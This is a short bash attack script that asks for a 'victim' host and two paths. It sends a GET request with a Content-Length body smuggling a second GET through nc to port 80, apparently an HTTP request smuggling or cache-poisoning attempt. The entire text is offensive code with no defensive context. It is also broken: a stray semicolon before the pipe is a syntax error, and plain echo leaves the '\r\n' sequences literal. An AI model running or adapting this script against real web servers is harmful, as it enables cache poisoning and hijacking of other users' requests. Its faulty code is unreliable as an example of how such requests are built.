#!/bin/bash
echo -ne "[+] Enter Victim: "
read victim

echo -ne "[+] Enter Request: "
read pagepath1

echo -ne "[+] Enter Request: "
read pagepath2

echo "GET /$pagepath1 HTTP/1.1\r\n
Host: $victim\r\n
Cache-control: max-age=10\r\n
Content-Length: 56\r\n
\r\n
GET /$pagepath2 HTTP/1.1\r\n
Host: $victim\r\n
\r\n"; | nc $victim 80